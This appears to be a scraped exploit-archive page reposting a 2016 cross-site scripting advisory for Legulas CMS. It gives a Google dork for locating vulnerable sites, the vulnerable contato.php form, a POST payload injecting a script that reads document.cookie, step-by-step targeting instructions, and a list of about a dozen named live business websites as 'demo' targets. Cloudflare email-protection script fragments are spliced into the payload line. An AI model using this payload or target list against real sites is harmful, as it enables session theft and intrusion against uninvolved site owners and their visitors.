Home / os / blackberry

Legulas CMS Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>Legulas CMS Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Legulas CMS Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.legulas.com.br/ # Google Dork : intext:"Desenvolvido por Légulas 2013" # Date: 29 Apr 2016 # Tested On : Kali # Contact:<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="9df3aee9b3f5fcfef6f8efddfaf0fcf4f1b3fef2f0">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> ###################### # Vulnerable File : contato.php # Request Method: POST # Payload : assunto=1&<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="cca9a1ada5a0f1a2ffb8e2a4adafa7a9be8caba1ada5a0e2afa3a1">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>&mensagem=20&nome=ndnvhdaj'%22()%26%25<acx><ScRiPt%20>alert(document.cookie)</ScRiPt>&telefone=555-666-0606 # Describe : Search dork and select Target. Put /contato.php After url such as : # http://site.com/contato.php # Send data with post method ... Ok # # Demo : # http://www.jeepclubedecuritiba.com.br/contato.php # http://www.prbinstalacoes.com.br/contato.php # http://www.dumesquita.com.br/contato.php # http://www.attos.ind.br/contato.php # http://www.aquarioemacrilico.com.br/contato.php # http://casadaazeitona.com.br/contato.php # http://www.almeidamateriais.com.br/contato.php # http://www.domakoskicarnes.com.br/contato.php # http://metalurgica3g.com.br/contato.php # http://www.grespcred.com.br/contato.php # http://www.unisat-br.com.br/contato.php # http://www.streakwave.com.br/contato.php # # ###################### # discovered by : Net Hacker ######################</BODY></HTML>

 

TOP